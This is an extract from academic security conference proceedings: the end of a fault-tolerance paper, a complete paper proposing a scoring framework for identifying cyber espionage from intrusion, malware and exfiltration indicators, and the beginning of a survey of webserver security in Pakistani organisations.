M=5 M=10 M=15 M=25<br />
0.3 0.5 0.65 0.95<br />
248.97 241.57 238.16 235.06<br />
This paper proposes a hardware based proactive solution to secure the recovery phase of mission<br />
critical applications. A detailed threat model is developed to analyze the security provided by our<br />
scheme. The biggest strengths of this research is its ability to deal with smart adversaries, give priority<br />
to mission assurance, and use redundant hardware for capturing integrity status of a replica outside<br />
the user space. Since this scheme is simple and has no visible application specific dependencies, its<br />
implementation has the potential to be application transparent. For performance evaluation, we<br />
investigated a simplified mission critical application prototype using a multi-step simulation approach.<br />
We plan to enhance the centralized architecture to a distributed system for our future research work.<br />
We defined cases to investigate the cost involved in applying our security scheme to all kinds of<br />
systems (including the legacy systems with no fault tolerance). The performance evaluation showed<br />
promising results and the cost/performance overhead is only a small percentage of the original<br />
execution times when faults are absent. As the rate of fault occurrence increases, the overhead<br />
increases too, but this additional overhead comes with fault tolerance and security. Overall, we<br />
believe that our solution provides strong security at low cost for mission critical applications.<br />
Acknowledgments<br />
This work was supported in part by ITT Grant No. 200821J. This paper has been approved for Public<br />
Release; Distribution Unlimited: 88ABW-2010-6094 dated 16 Nov 2010.<br />
References<br />
Abramovici, M. and Stroud, C.E. (2001) "BIST-based test and diagnosis of FPGA logic blocks", IEEE<br />
Transactions on VLSI Systems, volume 9, number 1, pages 159-172, February.<br />
Banatre, M., Pataricza, A., Moorsel, A., Palanque, P. and Strigini, L. (2007) From resilience-building to resiliencescaling<br />
technologies: Directions – ReSIST, NoE Deliverable D13. DI/FCUL TR 07–28, Dep. Of<br />
Informatics, Univ. of Lisbon, November.<br />
Bessani, A., Reiser, H.P., Sousa, P., Gashi, I., Stankovic, V., Distler, T., Kapitza, R., Daidone, A. and Obelheiro,<br />
R. (2008) “FOREVER: Fault/intrusiOn REmoVal through Evolution & Recovery”, Proceedings of the ACM<br />
Middleware'08 companion, December.<br />
Del Carlo, C. (2003) Intrusion detection evasion, SANS Institute InfoSec Reading Room, May.<br />
Elnozahy, E.N., Alvisi, L., Wang, Y. and Johnson, D.B. (2002) "A survey of rollback-recovery protocols in<br />
message-passing systems", ACM Computing Surveys (CSUR), volume 34 number 3, pages 375-408,<br />
September.<br />
Haeberlen, A., Kouznetsov, P. and Druschel, P. (2006) “The case for Byzantine fault detection”, Proceedings of<br />
the 2nd conference on Hot Topics in System Dependability, volume 2, November.<br />
Hrivnak, A. (2002) Host Based Intrusion Detection: An Overview of Tripwire and Intruder Alert, SANS Institute<br />
InfoSec Reading Room, January.<br />
Kalbarczyk, Z., Iyer, R.K., Bagchi, S. and Whisnant, K. (1999) "Chameleon: a software infrastructure for adaptive<br />
fault tolerance", IEEE Transactions on Parallel and Distributed Systems, volume 10, number 6, pages 560-<br />
579, June.<br />
Mehresh, R., Upadhyaya, S. and Kwiat, K. (2010) “A Multi-Step Simulation Approach Toward Fault Tolerant<br />
system Evaluation”, Third International Workshop on Dependable Network Computing and Mobile Systems,<br />
October.<br />
Patterson, D. and Hennessy, J. (1994) Computer Organization and Design: The Hardware/Software<br />
Interface, Morgan Kaufmann.<br />
Sousa, P., Bessani, A., Correia,M., Neves, N.F. and Verissimo, P. (2007) “Resilient intrusion tolerance through<br />
proactive and reactive recovery”, Proceedings of the 13th IEEE Pacific Rim Int. Symp. on Dependable<br />
Computing, pages 373–380, December.<br />
Todd, A.D., Raines, R.A., Baldwin, R.O., Mullins, B.E. and Rogers, S.K. (2007) “Alert Verification Evasion<br />
Through Server Response Forging”, Proceedings of the 10th International Symposium, RAID, pages 256-<br />
275, September.<br />
Wagner, D. and Soto, P. (2002) “Mimicry attacks on host-based intrusion detection systems”, Proceedings of the<br />
9th ACM conference on Computer and communications security, November.<br />
179
Identifying Cyber Espionage: Towards a Synthesis<br />
Approach<br />
David Merritt and Barry Mullins<br />
Air Force Institute of Technology, Wright Patterson Air Force Base, Ohio, USA<br />
david.merritt@afit.edu<br />
barry.mullins@afit.edu<br />
Abstract: Espionage has existed in many forms for as long as humans have kept secrets. With the skyrocketing<br />
growth of digital data storage, cyber espionage has quickly become the tool of choice for corporate and<br />
government spies. Cyber espionage typically occurs over the Internet with a consistent methodology: 1) infiltrate<br />
a targeted network, 2) install malware on the targeted victim(s), and 3) exfiltrate data at will. Detection methods<br />
exist and are well-researched for these three realms: network attack, malware, and data exfiltration. However,<br />
formal methodology does not exist for identifying cyber espionage as its own classification of cyber attack. This<br />
paper proposes a synthesis approach for identifying targeted espionage by fusing the intelligence gathered from<br />
current detection techniques. This synthesis of detection methods establishes a formal decision-making<br />
framework for determining the likelihood of cyber espionage.<br />
Keywords: covert channel, cyber espionage, data exfiltration, intrusion detection, malware analysis<br />
1. Introduction and background<br />
The cyber espionage threat is real. Because of the low cost of entry into and the anonymity afforded<br />
by the Internet realm, any curious or incentivized person can steal secret information off private<br />
computer networks (US-China, 2008). If a spy steals proprietary knowledge of a private company's<br />
innovative product research and development, then this data holds a high monetary value, reportedly<br />
billions of dollars, to an industry competitor (Epstein, 2008). If that stolen information is sensitive to<br />
national defense or national strategy decision-making, then the value is arguably immeasurable.<br />
A consistently effective defense against cyber espionage requires a consistently effective way to<br />
identify it. While there are methodologies to detect facets of cyber espionage, there is no formal<br />
approach for identifying cyber espionage as a stand-alone network event classification in its own right.<br />
This paper proposes a new approach that uses the synthesis of current cyber warfare detection and<br />
analysis techniques in a framework to holistically identify malicious or suspicious network events as<br />
cyber espionage.<br />
Due to the myriad of network attack methods and traditional espionage techniques, this paper cannot<br />
comprehensively address all techniques that a cyber spy would employ to achieve his mission (e.g.,<br />
insider threat or physical access). Instead, the paper focuses on the most common method of<br />
performing cyber espionage from a remote location outside the victims’ local network. Historically, the<br />
most common method for infiltrating a network for this purpose is through targeted spear phishing<br />
emails with malicious file attachments (SANS Institute, 2008). Both the emails and attachments are<br />
products of effective social engineering methods that tailor the content to the recipients of the emails.<br />
When an unsuspecting, targeted user opens the attachment, the malware, and therefore the cyber<br />
spy, establish a foothold on the computer and affected network. The spy can then use his specialized<br />
malware to search for interesting data on the victim computer and network and exfiltrate this<br />
potentially sensitive data from the victim network to a place of his choosing.<br />
The synthesis approach and decision-making framework proposed in this paper allows a network<br />
defender to correctly identify this kind of targeted cyber espionage event. If this methodology is to<br />
catch cyber spies targeting specific victims, then this detection approach must look at each malicious<br />
activity (i.e., network infiltration, malware installation, and data exfiltration) within the context of the<br />
whole espionage event. This approach does not attempt to introduce new ways to detect network<br />
attacks, malware infections, or data exfiltration beyond the bounds of the current field of research.<br />
Rather, the current detection methods are integrated in a new way that yields a synthesis approach to<br />
categorize cyber espionage events. The paper first discusses techniques to detect each of the spy's<br />
three steps to espionage success, and then the synthesis approach and resulting framework are<br />
explained. Section 2 reviews network infiltration detection methods. Section 3 looks at detecting<br />
malware on a computer. Section 4 discusses the detection of data exfiltration. Section 5 poses the<br />
synthesis detection approach, followed by a conclusion and discussion of future work in Section 6.<br />
180
2. Network infiltration detection<br />
David Merritt and Barry Mullins<br />
Intrusion detection helps us answer the question: “Is there a malicious intrusion into the network?”<br />
Because there are countless manual and automated mechanisms to identify suspicious network<br />
behavior, this section will only discuss the most common techniques for intrusion detection. This<br />
glimpse into intrusion detection serves as a backdrop for the explanation of the synthesis approach,<br />
which assumes that network infiltration can be detected somewhat reliably.<br />
A network-based intrusion detection system (NIDS) detects network-oriented attacks and traditionally<br />
monitors the access points into a network. If a cyber spy chooses a common network attack method<br />
to infiltrate a network, such as a common buffer overflow exploit, then the NIDS will have a high<br />
detection success rate (Patcha and Park, 2007: 3448-3470). If there is a novel or sophisticated attack<br />
that is difficult to detect, NIDS relies on its anomaly detection capability. Kuang and Zulkernine (2008:<br />
921-926) have shown that an anomaly-based NIDS employing the Combined Strangeness and<br />
Isolation measure K-Nearest Neighbors algorithm can accurately identify novel attacks at a detection<br />
rate of 94.6%, where the detection rate is defined as the ratio of correctly classified network intrusion<br />
samples to the total number of samples.<br />
3. Malware detection<br />
Malware detection helps us answer the question: “Is there something malicious happening on a<br />
host?” This section is not an exhaustive survey of all malware detection mechanisms and methods.<br />
Rather, it simply makes evident the fact that there are numerous ways to reliably detect most malware<br />
on a system. Malware comes in many forms with many names. For simplicity and convenience, we<br />
will refer to any unwanted and malicious program or code running on a system as malware. Naturally,<br />
detection of unknown malware is the goal, assuming the cyber spy will use sophisticated, novel<br />
malicious programs to establish footholds on a computer and within a network.<br />
3.1 Antivirus<br />
Antivirus, or anti-malware, software does not need much explanation as it is a commonly used and<br />
moderately understood term. Antivirus products rely primarily on signature-based detection, although<br />
most products have integrated at least a rudimentary mechanism for behavioral analysis of<br />
executables. The vast majority of known malware is caught by commodity software. As a point of<br />
reference, most antivirus products have proven they can detect malware in sample sizes of over one<br />
million with accuracy in the upper 90 th percentile (Virus Bulletin, 2008).<br />
3.2 Malware analysis<br />
There are historically two methods of analyzing unknown programs, or binaries: static and dynamic<br />
(Ding et al, 2009: 72-77). Static analysis starts with the conversion of a program from its binary<br />
representation to a more symbolic, human-readable version of assembly code instructions. This<br />
disassembly ideally takes into account all possible code execution paths of the unknown program,<br />
which provides a reverse engineer with the complete set of program instructions and therefore inner<br />
workings of the unknown program’s code. Analyzing this code to discover a program’s purpose and<br />
capabilities makes up the bulk of static analysis. Christodorescu et al (2005: 32-46) and Kruegel,<br />
Robertson and Vigna (2004: 91-100) discuss a couple effective approaches in using this kind of<br />
analysis to detect and classify unknown malware.<br />
On the other hand, analyzing the code during execution is called dynamic analysis. Dynamic analysis<br />
is effective against binaries that obfuscate themselves or are self-modifying. This is due to the fact<br />
that the destiny of all programs is to be run on a system, so when the program is running, its behavior<br />
and subsequent system modifications can be seen. Willems, Holz and Freiling (2007: 32-39) and<br />
Bayer et al (2006: 67-77) discuss dynamic analysis techniques that are successful in detecting<br />
unknown malware. Also, Rieck et al (2008: 108-125) used a learning based approach to automatically<br />
classify 70% of over 3,000 previously undetected malware binaries.<br />
4. Data exfiltration detection<br />
Data exfiltration detection helps us answer the question: “Is someone stealing data off the network?”<br />
Detecting suspicious and outright malicious events in the realm of data exfiltration is arguably the<br />
most difficult but most important to achieve out of the three steps of cyber espionage. Because the<br />
existence of a computer network implies the need for data to be accessed both inbound to and<br />
181
David Merritt and Barry Mullins<br />
outbound from a network, the task of identifying a “bad” stream of data leaving the network amidst a<br />
flood of “good” data is daunting.<br />
Many convenient overt channels exist with the Internet. With a significant bulk of network traffic on<br />
any given local network being Internet-related, any web-based protocol offers a readily available overt<br />
channel within which a spy can easily exfiltrate stolen data. The sheer amount of web traffic makes it<br />
easy to hide the communication channel—the data is just one animal in a herd at that point.<br />
Fortunately, custom signatures can be generated for specific, sensitive data that would trigger a NIDS<br />
alert if this data were detected on its way out of a network (Liu, 2008).<br />
Thanks to several innovative research efforts, it is possible to detect many kinds of covert channels.<br />
Gianvecchio and Wang (2007) use a corrected conditional entropy (CCE) approach to accurately<br />
detect covert timing channels in HTTP (hypertext transfer protocol) traffic. Similarly, Cabuk, Brodley,<br />
and Shields (2009) use a measure of compressibility to distinguish covert timing channel traffic from<br />
conventional web-based traffic. While there are a multitude of other types of covert channels, like<br />
those using packet header fields or timestamps, there are approaches to eliminate, reduce, or at least<br />
detect these (Zander, Armitage, and Branch, 2007: 44-57).<br />
5. Synthesis detection approach<br />
From the perspective of preventing the compromise of sensitive information, it is crucial to determine<br />
if anomalous, suspicious, or malicious occurrences are part of a cyber espionage attempt or not. In<br />
other words, to prevent cyber espionage, one must first be able to identify it reliably. However, there is<br />
a surprising lack of research focused on identifying or labeling network events as cyber espionage.<br />
The Defense Personnel Security Research Center (PERSEREC) produced a technical report in 2002<br />
on 150 cases of espionage against the United States by American citizens (Herbig and Wiskoff,<br />
2002). The Defense Intelligence Agency's (DIA) Counterintelligence and Security Activity (DAC) used<br />
the results of PERSEREC's report to produce a guide to aid its employees in reporting potential<br />
espionage-related behaviors in their colleagues (Office 2007). Essentially, the DIA relies on a<br />
synthesis of indicators to aid in its detection of spies.<br />
This paper adopts the same synthesis approach to detecting cyber espionage. Operating under the<br />
premise that cyber espionage emits telltale signs, the search for these indicators begins by looking at<br />
a series of questions with, hopefully, intuitive and obvious answers that lead to a framework of<br />
measurement.<br />
5.1 How would a spy infiltrate a network?<br />
If an attacker were only concerned with gaining access into a network, he would justifiably launch as<br />
many attacks against as many victims as possible. This increases his likelihood of success. But this<br />
torrent of binary madness will also draw much attention. A cyber spy who intends to steal sensitive<br />
information from a network will typically take a more streamlined avenue into the network, one that is<br />
less noisy and has a higher probability of success. This mentality and intention will drive the spy to<br />
use more strategy in choosing his attack tools and methods. Also, based on the spy’s knowledge of<br />
his victims and his desire to evade detection, he will target a relatively small number of victim<br />
systems. Spear phishing emails sent to a handful of selected victims is indicative of espionage. In<br />
addition, if the content of the email is tailored to be very specific and relevant to the industry, then this<br />
would be a telltale sign of cyber espionage. This thought process reveals a couple indicators we can<br />
use to distinguish network intrusions that are highly probable espionage events from those that are<br />
not: targeted and tailored.<br />
5.2 What kind of malware would a spy use?<br />
If an attacker just wanted to infect as many machines as possible to expand his ever-growing botnet,<br />
this attacker's malware of choice would eventually run rampant and widespread across the Internet, or<br />
else it would not accomplish its master's goal. Looking at the other end of the spectrum, assuming a<br />
spy would want to evade detection and maintain persistent, reliable access to data, the spy would<br />
probably choose malware that is not easily detectable. Malware that is very well known is likely not<br />
the strategically-chosen tool of a cyber spy. In addition, since the name of the espionage game is to<br />
obtain information, it would make sense for espionage-related malware to have some sort of datagathering<br />
functionality. Furthermore, if the malware is sophisticated enough to change tactics or focus<br />
182
David Merritt and Barry Mullins<br />
on certain information upon receiving new commands from the attacker, then this would be an even<br />
stronger indicator of espionage. Essentially, we have established two more indicators to find probable<br />
espionage malware: detectability and information-gathering.<br />
5.3 How would a spy exfiltrate data?<br />
We have already discussed that there are many ways to move data out of a network. In fact, the ease<br />
of data transfer is an underlying measure of network usefulness. If a typical network attacker were<br />
only concerned with collecting data regardless of who else sees it, then he may choose the most<br />
convenient avenue of data exfiltration. A cyber spy would want to follow the same mentality portrayed<br />
in his choice of network intrusion and malware infection techniques. That is, the spy would probably<br />
prefer to evade detection altogether, or at least attempt to hide his needle in the haystack of network<br />
traffic. In addition, the spy would most likely prefer to hide the data itself while it is transiting the<br />
network. Sending the stolen information over the network in clear text may reveal too much of his<br />
intent.<br />
Naturally, the spy would want to make his efforts worthwhile—the more data he can steal, the more<br />
worthwhile the mission. A spy who collects all information pertaining to a certain product will surely be<br />
sending relatively large amounts of data outbound, and his intentions would be difficult to detect if the<br />
data were encrypted. Clearly, very large amounts of encrypted data emitting from a network warrants<br />
a closer look, and this method of data exfiltration seems fairly spy-like. If this data could be decrypted<br />
to uncover very specific information relevant to the industry, especially if it is private or proprietary,<br />
then this is surely a telltale sign of espionage. In fact, this metric of industry-specific information is a<br />
strong indicator by itself. But it may not always be possible to decrypt the data in a timely manner, so<br />
we must include this indicator with other indicators of data exfiltration.<br />
Inherently, hiding the very existence of a communication channel screams of the intent to evade<br />
detection and, thus, warrants a closer look. Suffice it to say that the use of a covert channel is very<br />
spy-like. Therefore, more espionage indicators have been uncovered pertaining to data exfiltration:<br />
channel covertness, transfer size, encryption, and relevance of information.<br />
5.4 Espionage identification framework<br />
The following is a summary of potential indicators for cyber espionage:<br />
Intrusion:<br />
Targeted with selective victims<br />
Tailored through social engineering<br />
Malware:<br />
Novel or unknown<br />
Information/data-stealer<br />
Exfiltration:<br />
Covert channel<br />
Encrypted data or channel<br />
Large amount of data<br />
Industry-specific information<br />
These indicators can be used as an objective framework for subjective decision-making concerning<br />
the probability of espionage for a given event. An overall event that satisfies every intrusion, malware,<br />
and exfiltration indicator is likely espionage-related, but a cyber espionage event may not explicitly<br />
fulfill each and every indicator. In other words, the absence of one of these indicators does not<br />
automatically preclude an overall event from being attributable to cyber espionage.<br />
Given this framework, if there is a way to detect and subsequently score each individual intrusion,<br />
malware, or exfiltration event, then one can calculate a synthesis of those scores to categorize the<br />
overall intrusion + malware + exfiltration event. Taken a step further, if this synthesis score is related<br />
183
David Merritt and Barry Mullins<br />
to the probability of cyber espionage, it is possible to use this score to measure the probability of the<br />
entire event as being cyber espionage.<br />
It is important to note that an individual event detected by itself may not express outright if a<br />
circumstance is cyber espionage-related or not. A targeted, socially-engineered intrusion might be a<br />
sophisticated spam or phishing attempt. New and undetected information-stealing malware could be a<br />
new variant of benign adware. A consistent transfer of significant amounts of encrypted data could<br />
end up being an authorized VPN (virtual private network) connection. The subtlety of a covert channel<br />
may be difficult to detect or declare with certainty its intentions, but it does serve as an impetus to<br />
investigate further to determine the context of the channel.<br />
The advantage behind this synthesis approach is that intrusion, malware, or exfiltration detection can<br />
be viewed within the context of the whole event. Not doing so could lead to incorrect conclusions<br />
being drawn from insufficient context. But each step of a cyber spy's attack methodology is not of<br />
equal value to the investigator. For instance, it is a challenge to judge the intent of malware simply by<br />
looking at its detectability and functionality. Many malicious programs have the same functionality but<br />
are used for different purposes. In fact, many legitimate programs are frequently used maliciously<br />
(e.g., Remote Administration Tools). On the contrary, a targeted intrusion that is industry-relevant<br />
hints at the intentions of the adversary—to quietly get to specific targets. Thus, the intrusion factor<br />
should be weighted more than the malware “factor”. Similarly, with data exfiltration detection,<br />
covertness of the channel and sensitivity of the data are significant factors affecting the<br />
characterization of espionage. These factors' weights should have more weight than the malware<br />
installation factor.<br />
This strategic weighting of indicators is integrated to establish the Espionage Probability Matrix (EPM)<br />
framework, shown in Table 1. The EPM is used to determine an EPM score based on varying degrees<br />
of espionage probability, as indicated by the three columns of High, Medium, and Low Probability.<br />
Each indicator is assigned a value associated with its column, with High, Medium, and Low indicators<br />
being assigned values of 3, 2, and 1, respectively. The values for the indicators (e.g., targeted and<br />
tailored network intrusion) within each factor (e.g., Intrusion) are averaged to provide an EPM score<br />
for that factor. For example, a network intrusion that is not targeted at a specific user/group but<br />
contains somewhat tailored content results in an Intrusion factor EPM score of 1.5. This is calculated<br />
by averaging the “Not targeted” indicator (i.e., 1) with the “Potentially tailored” indicator (i.e., 2).<br />
Table 1: Espionage Probability Matrix (EPM)<br />
Intrusion<br />
Malware<br />
Exfiltration<br />
High Probability Medium Probability Low Probability<br />
Targeted; specific victims<br />
Tailored; social engineering<br />
required<br />
Novel or unknown<br />
Advanced info/data- stealer<br />
Covert channel<br />
Custom encryption<br />
Significant data transfer<br />
Industry-specific<br />
Potentially targeted<br />
Potentially tailored; social<br />
engineering may be used<br />
Not well known; variant of<br />
known<br />
Info/data- stealer<br />
Attempts to hide channel<br />
Standard encryption<br />
Non-trivial data transfer<br />
Partially industry-specific<br />
Not targeted<br />
Well-known methods<br />
Well known<br />
Not info/data-stealer<br />
No attempt to hide channel<br />
Not encrypted<br />
Negligible data transfer<br />
Not industry-specific<br />
The Intrusion row has a α multiplier, where α > 1, to represent the relative importance of intrusion<br />
classification to the overall EPM score. The Exfiltration row has a β multiplier, where β > 1, to<br />
represent the relative importance of data exfiltration classification to the overall EPM score. This<br />
effectively assigns greater importance to the factors that deserve it, as discussed. These individual<br />
probabilities are brought into context of the entire event by calculating an overall EPM score using the<br />
following equation:<br />
EPM Score = α·Intrusion + Malware + β·Exfiltration<br />
184
David Merritt and Barry Mullins<br />
Essentially, summing the individual weighted scores yields a “grade” for intrusion, malware, and<br />
exfiltration classification taken within the context of one another. For the purpose of this paper, a<br />
notional α multiplier of 2 and a β multiplier of 3 are used to illustrate the effectiveness and flexibility of<br />
this synthesis approach. Operationally, these values can be fine-tuned and adjusted as needed.<br />
However, this score has little value without a translation to what it could mean. The EPM score is<br />
used in the Espionage Threshold Matrix (ETM), shown in Table 2.<br />
Table 2: Espionage Threshold Matrix (ETM), assuming α=2 and β=3<br />
Overall Probability of<br />
Cyber Espionage<br />
EPM Score<br />
High Probability ≥12<br />
Medium Probability ≥9<br />
Low Probability
David Merritt and Barry Mullins<br />
2010). The attackers use social engineering and target source code and intellectual property (Stamos<br />
2010: 1). This attack receives the maximum Intrusion and Malware EPM scores. In the absence of full<br />
details, we assume the exfiltration channel uses standard encryption, and the amount of data<br />
transferred is not significant from the perspective of each individual company. Exfiltration receives a<br />
score of 2.5 to produce an overall EPM score of 16.5. This is well above the threshold for high<br />
probability of cyber espionage, according to the ETM.<br />
The scores of the EPM and thresholds of the ETM can be tuned according to a user's tolerance of<br />
false positives, false negatives, or strength of desire to prevent sensitive data loss. The ETM score<br />
can be a critical decision-making tool for network defenders and data owners who understand the<br />
importance of identifying cyber espionage using a reliable, consistent, and robust framework based<br />
on an innovative synthesis approach.<br />
6. Conclusion and future work<br />
This paper discusses the significant threat of cyber espionage and the importance of identifying and<br />
attributing activities to cyber espionage. The paper introduces a new synthesis approach and<br />
framework for identifying cyber espionage that fills the void in this research area due to the lack of<br />
formal methods for holistically determining cyber espionage events. This new approach capitalizes on<br />
current detection capabilities and integrates their results into a framework called the EPM. This<br />
framework takes into account the context of individual events to determine the likelihood of cyber<br />
espionage by using the ETM.<br />
Because this synthesis approach is the first formal methodology for categorizing holistic network<br />
events as cyber espionage, there are several questions that it begs. Is this framework effective if all<br />
three steps of espionage cannot be detected or they are detected out of order (e.g., exfiltration is the<br />
initial indicator of a suspicious event)? On effectiveness, how is it measured, and is there a more<br />
effective or efficient algorithm or methodology for identifying cyber espionage? Is it possible to<br />
automate the entire model, or will manual, human-in-the-loop processes always be needed?<br />
To help answer these questions, this approach and framework should be put to experiment, tested,<br />
and analyzed. It will surely be helpful to create an automated system that gathers data, alerts, and<br />
other relevant information from network and host-based sensors as well as from human analysis and<br />
inputs. In addition, observing additional real-world espionage-related malware and network intrusions<br />
is important to measuring the effectiveness of this model and answering the questions posed above.<br />
Acknowledgements<br />
This research is funded by the Center for Cyberspace Research at the Air Force Institute of<br />
Technology and the 688 th Information Operations Wing at Lackland Air Force Base, Texas. The views<br />
expressed in this paper are those of the authors and do not reflect the official policy or position of the<br />
United States Air Force, Department of Defense, or the U.S. Government.<br />
References<br />
Cabuk, S., Brodley, C. E. and Shields, C. ‘IP Covert Channel Detection’, ACM Trans. Information and Syst.<br />
Security, vol. 12, no. 4, article 22, Apr. 2009.<br />
Ding, J., Jin, J., Bouvry, P., Hu, Y. and Guan, H. ‘Behavior-based Proactive Detection of Unknown Malicious<br />
Codes’, 2009 4 th Int. Conf. Internet Monitoring and Protection, Venice/Mestre, Italy.<br />
Epstein, K. (2008, Dec. 7) ‘U.S. Is Losing Global Cyber War, Commission Says’, BusinessWeek, [Online],<br />
Available: http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db2008127_<br />
817606.htm?chan=top+news_top+news+index+-+temp_ dialogue+ with+readers.<br />
Gianvecchio, S. and Wang, H. ‘Detecting Covert Timing Channels: An Entropy-Based Approach’, Proc. 14th<br />
ACM Conf. on Computer and Communications Security, Alexandria, Virginia, October 28-31, 2007.<br />
Herbig, K. and Wiskoff, M ‘Espionage Against the United States by American Citizens’, TRW Systems, Defense<br />
Personnel Security Research Center, Monterey, CA, Tech. Rep. 02-5, July 2002.<br />
Keizer, G. (2010, Sep. 15) ‘Google hackers behind Adobe Reader PDF zero-day bug, Symantec warns’, [Online],<br />
Available: http://news.techworld.com/security/3239606/google-hackers-behind-adobe-reader-pdf-zero-daybug-symantec-warns/<br />
Kuang, L.L. and Zulkernine, M. ‘An anomaly intrusion detection method using the CSI-KNN Algorithm’, in Proc.<br />
2008 ACM Symposium on Applied Computing, Fortaleza, Ceara, Brazil, March 16-20.<br />
Liu, T., Corbett, C., Chiang, K., Archibald, R., Mukherjee, B. and Ghosal, D. ‘Detecting Sensitive Data Exfiltration<br />
by an Insider Attack’, Proc. 4th Annu. Workshop on Cyber Security and Information Intelligence Research:<br />
186
David Merritt and Barry Mullins<br />
Developing Strategies to Meet Cyber Security and Information Intelligence Challenges Ahead, Oak Ridge,<br />
TN, May 12-14, 2008, vol. 288, no. 16.<br />
Office of the National Counterintelligence Executive (2007, Mar.) ‘Your Role in Combating the Insider Threat’,<br />
[Online], Available: http://www.ncix.gov/archives/docs/Your_Role_in_Combating_the_ Insider_Threat.pdf.<br />
Patcha, A. and Park, J. M. “An overview of anomaly detection techniques: Existing solutions and latest<br />
technological trends,” Computer Networks, vol. 51, no. 12, Aug. 2007.<br />
Rieck, K., Holz, T., Willems, C., Dussel, P. and Laskov, P. ‘Lecture Notes in Computer Science’, Detection of<br />
Intrusions and Malware, and Vulnerability Assessment, vol. 5137, Berlin/Heidelberg, Germany: Springer,<br />
2008.<br />
SANS Institute (2008) ‘Top Ten Cyber Security Menaces for 2008’, [Online]. Available:<br />
http://www.sans.org/2008menaces/.<br />
Stamos, A. (2010) ‘”Aurora” Response Recommendations’, iSEC Partners, Inc.<br />
2008 Report to Congress, [Online], http://www.uscc.gov/annual_report/2008/annual_report _full_08.pdf<br />
Virus Bulletin Ltd. (2008, Sept. 2) ‘AV-Test Release Latest Results’, Virus Bulletin, [Online], Available:<br />
http://www.virusbtn.com/news/ 2008/09_02.<br />
Zander, S., Armitage, G., Branch, P. ‘A Survey of Covert Channels and Countermeasures in Computer Network<br />
Protocols’, IEEE Communications Surveys and Tutorials, vol. 9, no. 3, 2007.<br />
Zetter, K. (2010, Jan. 14) ‘Google hack attack was ultra sophisticated, new details show’, [Online], Available:<br />
http://www.wired.com/threatlevel/2010/01/operation-aurora/.<br />
187
Security Analysis of Webservers of Prominent<br />
Organizations of Pakistan<br />
Muhammad Naveed<br />
Free Lance Research, Pakistan<br />
mnaveed29@gmail.com<br />
Abstract: Insecure webservers are a serious threat to the organization’s repute and resources. Successful attack<br />
on webservers can destroy the trust of customers or people getting services from the organization. Webservers<br />
were selected for this study because they provide easily accessible entrance to the network from the Internet and<br />
security of webservers should be considered as an index to assess the organization’s overall information security.<br />
This study analyzes the webservers of prominent organizations of Pakistan to assess their level of security.<br />
Webservers of different types of organizations were selected to provide a general view of security of Pakistani<br />
webservers. The selected webservers were of the organizations who should be first to secure their webservers as<br />
they are the leaders in their respective fields in the country. So, all the smaller organizations can be assumed to<br />
have much lesser concern for security. Benchmark for every type of organization was first established to compare<br />
the results of the analysis with it. Nmap scanner was used to scan the webservers for security threats. The results<br />
reveal that the webservers in Pakistan are not secure and there is extreme need of awareness about information<br />
security in the country. The lack of importance given to information security can lead to cyber terrorism and might<br />
create lot of troubles for the country.<br />
Keywords: information security, analysis, security threats, Webserver, Pakistan, Nmap<br />
1. Introduction and background<br />
Security is one of the fundamental requirements for each and every network, just like it is the<br />
requirement for each and every human. Without proper security, a network is just like a house without<br />
doors and windows. In case the network has a lot of valuable information and resources, it’s like a<br />
bank full of money without any guards and security cameras. Just like the bank in the example will be<br />
a serious place for potential theft or robbery, same is the case with the insecure networks. But, there<br />
is much difference in human perceptions about the unsafe bank and insecure networks. People don’t<br />
understand the ultimate results of insecure networks and in Pakistan the situation is worst.<br />
Businesses and individuals don’t even consider it to be an element that needs consideration.<br />
Negligence in information security can have terrible consequences. It is not difficult to imagine the<br />
chaos created if an ill-intentioned person gains access to the country’s most trusted news channel’s<br />
website. Let’s suppose he just adds one single headline that a bomb has been placed at a specified<br />
place in the city or on some road side, what would be the troubles faced by the people? Let’s take<br />
another example, if he just adds one line that prime minister has said that we are going to attack our<br />
neighbor soon, which may end up in bloody feud between the two countries or at least create<br />
misunderstandings between the countries and can seriously damage the relationships between the<br />
countries. Trend Micro Data–stealing malware focus report of June 2009 says, “In March 2008, data<br />
from 4.2 million credit card numbers were stolen in transmission as a result of malware installed on all<br />
of Hannaford Brothers’ servers in 300 stores”. (Trend Micro 2009) There are hundreds of other<br />
examples of attacks performed to achieve malicious objectives.<br />
The study analyzes the webservers of famous and most reputable organizations of the country. Three<br />
types of organizations were considered for the study: Education and Research, Commercial<br />
Organizations and News channels. Benchmark is first set by analyzing the world’s respectable<br />
organizations and whose analysis shows their webservers to be almost completely secure.<br />
Benchmark is set, so that the results can be compared with them. Exactly similar Pakistani<br />
organizations’ webservers as the organizations used to set benchmarks were analyzed to give an<br />
insight about the information security awareness in the country. Organizations selected for analysis<br />
should be first to implement security on the basis of their status and business capacity. Webservers<br />
were selected because they can be easily analyzed from Internet and analysis of webservers<br />
provides insight for the complete network security of the organization. Nmap scanner was used to get<br />
the results. The identity of the Pakistani organizations analyzed is kept secret because of the possible<br />
damage to the repute of the organization. But, it is simple to use Nmap scanner to analyze any<br />
organization’s web server and getting almost the similar results for many organizations of the similar<br />
type. So, the results are basically an indicator of the security awareness on a large scale.<br />
188
Muhammad Naveed<br />
Pakistan Computer Emergency Response Team’s list of only reported hacked Pakistani websites<br />
from 1999 to 2005 is available on (PakCert 2005). Statistics of hacked Pakistani websites is shown in<br />
Figure 1. (PakCert 2008) Recently, many important websites of Pakistan were hacked including<br />
website of Supreme Court of Pakistan, Pakistan Navy and lot of others websites of extremely<br />
important organizations. (PakCert, 2005; PakCert, 2008; The Express Tribune, 2010; Jahanzaib,<br />
2010; GEO Pakistan, 2010; DawnNews, 2010)<br />
Figure 1: Statistics of hacked Pakistani websites (only .PK TLD) (PakCert (2008), ‘Defacement<br />
Statistics (January 1999 - August 2008)'’, Pakistan Computer Emergency Response<br />
Team)<br />
Paper is organized as: Section 2 gives the related work, section 3 shows the experimental setup used<br />
for the study, section 4 explains different port states shown by Nmap, section 5 sets the benchmarks<br />
for comparison, section 6 shows the actual analysis of web servers in Pakistan, and section 7<br />
concludes the paper and gives the simple solution to rectify the security problems.<br />
2. Related work<br />
There is very little work done on analyzing information security of Pakistani organizations. To the best<br />
of my knowledge the first study to address the concern about the need of information security in<br />
Pakistan is (Syed 1998) which proposes that it is very important for Pakistan to have both offensive<br />
and defensive Information Warfare capabilities.(Syed 1998)<br />
Vorakulpipat, C. et. al have explored information security practices in Thailand and have emphasized<br />
the need for information security benchmarking of an organization with best security practices.<br />
